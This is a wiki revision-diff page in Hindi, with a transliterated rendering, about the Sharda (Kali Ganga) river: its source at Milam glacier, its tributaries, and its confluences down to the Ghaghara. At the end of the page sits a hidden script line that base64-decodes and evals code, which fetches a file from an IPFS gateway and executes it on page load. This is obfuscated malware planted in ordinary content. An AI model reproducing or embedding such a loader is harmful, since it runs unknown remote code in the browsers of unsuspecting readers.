Difference between revisions of "शारदा नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 5: Line 5:
 
==संगम==
 
==संगम==
 
उदगम के बाद लगभग 160 किमी॰ प्रवाहित होने के पश्चात पंचेश्वर के निकट इसमें सरयू और पूर्वी [[रामगंगा नदी|रामगंगा]] आकर मिलती हैं। यहीं से यह नदी सरयू या शारदा के नाम से पहाड़ियों में चक्करदार मार्ग से होकर [[ब्रह्मा|ब्रह्मदेव]] के निकट मैदानी भाग में प्रवेश करती है। यहाँ यह कई भागों में बँट जाती है। परन्तु आगे चलकर मुढ़िया के निकट से सभी प्रवाह मार्ग पुनः एक हो जाते हैं।  
 
उदगम के बाद लगभग 160 किमी॰ प्रवाहित होने के पश्चात पंचेश्वर के निकट इसमें सरयू और पूर्वी [[रामगंगा नदी|रामगंगा]] आकर मिलती हैं। यहीं से यह नदी सरयू या शारदा के नाम से पहाड़ियों में चक्करदार मार्ग से होकर [[ब्रह्मा|ब्रह्मदेव]] के निकट मैदानी भाग में प्रवेश करती है। यहाँ यह कई भागों में बँट जाती है। परन्तु आगे चलकर मुढ़िया के निकट से सभी प्रवाह मार्ग पुनः एक हो जाते हैं।  
*बहरामघाट के निकट पहुँचकर यह करनाली तथा [[करनाली या घाघरा नदी|घाघरा नदी]] में मिल जाती है।
+
*बहरामघाट के निकट पहुँचकर यह करनाली तथा [[घाघरा नदी|घाघरा नदी]] में मिल जाती है।
  
 +
 +
==सम्बंधित लिंक==
 +
{{भारत की नदियाँ}}
 
[[Category:भूगोल_कोश]]
 
[[Category:भूगोल_कोश]]
 
[[Category:भारत_की_नदियाँ]]
 
[[Category:भारत_की_नदियाँ]]

Revision as of 09:50, 2 June 2010

udagam sthal

is nadi ka udagam sthal kumaooan ke uttar poorvi bhag mean milam namak himanad hai. ise prarambh mean kali ganga ke nam se pukara jata hai. udagam ke nikat isaki do sahayak nadiyaan haian.

  • dharma
  • lisar

sangam

udagam ke bad lagabhag 160 kimi॰ pravahit hone ke pashchat pancheshvar ke nikat isamean sarayoo aur poorvi ramaganga akar milati haian. yahian se yah nadi sarayoo ya sharada ke nam se paha diyoan mean chakkaradar marg se hokar brahmadev ke nikat maidani bhag mean pravesh karati hai. yahaan yah kee bhagoan mean bant jati hai. parantu age chalakar mudhiya ke nikat se sabhi pravah marg punah ek ho jate haian.

  • baharamaghat ke nikat pahuanchakar yah karanali tatha ghaghara nadi mean mil jati hai.


sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>